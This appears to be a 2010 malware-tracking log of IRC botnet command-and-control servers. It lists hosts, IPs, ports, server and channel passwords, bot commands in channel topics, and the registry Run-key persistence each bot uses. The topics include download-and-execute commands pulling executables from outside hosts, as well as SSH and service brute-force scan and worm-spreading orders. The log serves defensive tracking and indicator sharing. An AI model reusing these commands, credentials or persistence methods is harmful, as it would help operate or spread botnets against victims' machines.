Thursday, December 23, 2010

irc.wanger.biz (Yewnix)

irc.wanger.biz:8782
46.4.232.76:8782
Nick: :{00-USA-XP-pc7-7123}
Username: blaze
Server Pass: weed
Joined Channel: #sshscan2
Channel Topic for Channel #sshscan2: ".scan sshgodscan 38 8 0 192.x.x.x -n -b |.scan sshgodscan 30 8 0 141.x.x.x -n -b |.scan sshgodscan 30 8 0 218.x.x.x -n -b"
Set by Yewnix on Tue Dec 21 20:50:57
Private Message to User {iNF-00-USA-XP-p\xb8\x8cI: "SC// Random Port Scan started on 218.x.x.x:22 with a delay of 8 seconds for 0 minutes using 30 threads."
Private Message to User {iNF-00-USA-XP-p\xb8\x8cI: "SC// Random Port Scan started on 192.x.x.x:22 with a delay of 8 seconds for 0 minutes using 38 threads."
Private Message to User {iNF-00-USA-XP-p\xb8\x8cI: "SC// Random Port Scan started on 141.x.x.x:22 with a delay of 8 seconds for 0 minutes using 30 threads."

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
Windows Data Serivce system32.exe
C:\WINDOWS\system32.exe

Sunday, December 19, 2010

aaaaaaaa.schooluni.us (bfbot) & (rxbot)

Found 2 addresses
addr: aaaaaaaa.schooluni.us ip: 109.196.130.66
addr: aaaaaaaa.schooluni.us ip: 109.196.130.50

aaaaaaaa.schooluni.us:7196
PASS laorosr
Channel#dpi
Channel#!
KCIK [N00_USA_XP_39922187]
rssr SP2-917 * 0 :COMPUTERNAME
Now talking in #!
Topic is '.asc -S|.http http://61.136.59.34/mobi.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a'
Set by nonSTOPspread66 on Sat Dec 18 23:19:01

Process
HKLM\SOFTWARE\Microsoft\Windows\CurrentVer.\policies\Explorer\Run\
Microsoft Driver Setup
C:\WINDOWS\gwdrive32.exe

Friday, December 17, 2010

im.maximum-irc.info

Found 4 addresses
addr: im.maximum-irc.info ip: 119.202.198.117
addr: im.maximum-irc.info ip: 139.91.102.100
addr: im.maximum-irc.info ip: 139.91.102.101
addr: im.maximum-irc.info ip: 150.165.168.123
im.maximum-irc.info:9595
139.91.102.101:9595
Nick: [USA|00|XP|P|48168]
Username: ywzyhaf
Server Pass: Peja0444@
Joined Channel: #!!IM!! with Password fatj00
Channel Topic for Channel #!!IM!!: ".dl.start http://dl.dropbox.com/u/14684555/r.exe C:\r.exe 1 -s"

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run\
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
Windows winlogin.exe
C:\WINDOWS\winlogin.exe

bean.F-QACS.INFO

bean.F-QACS.INFO:5337
178.162.175.63:5337
Nick: [NEW][USA]72014
Username: [NEW][USA]72014
Joined Channel: #ed

HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Windows Service Host
C:\Documents and Settings\Administrator\Application Data\svchost.exe

flash.quickupdates.net (Yewnix)

flash.quickupdates.net:5337
46.4.232.76:5337
Nick: :{00-USA-XP-pc3-3370}
Username: blaze
Joined Channel: #join with Password error
Channel Topic for Channel #join: ".aSc -S |.sub |.wu |.worm |.scan svrsvc_BRUTE 45 20 100 -r -b -e -s |.scan SVRSVC_ESP 35 3 0 -b -r -e -s |.scan SVRSVC_ESP_SP2 35 3 0 -b -r -e -s |.scan SVRSVC_ARG 35 3 0 -b -r -e -s |.scan SVRSVC_ARG_SP2 35 3 0 -b -r -e -s |.scan SVRSVC_RUS 35 3 0 -b -r -e -s |.scan SVRSVC_RUS_SP2 35 3 0 -b -r -e -s"

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ info
Windows Data Serivce C:\WINDOWS\services.exe

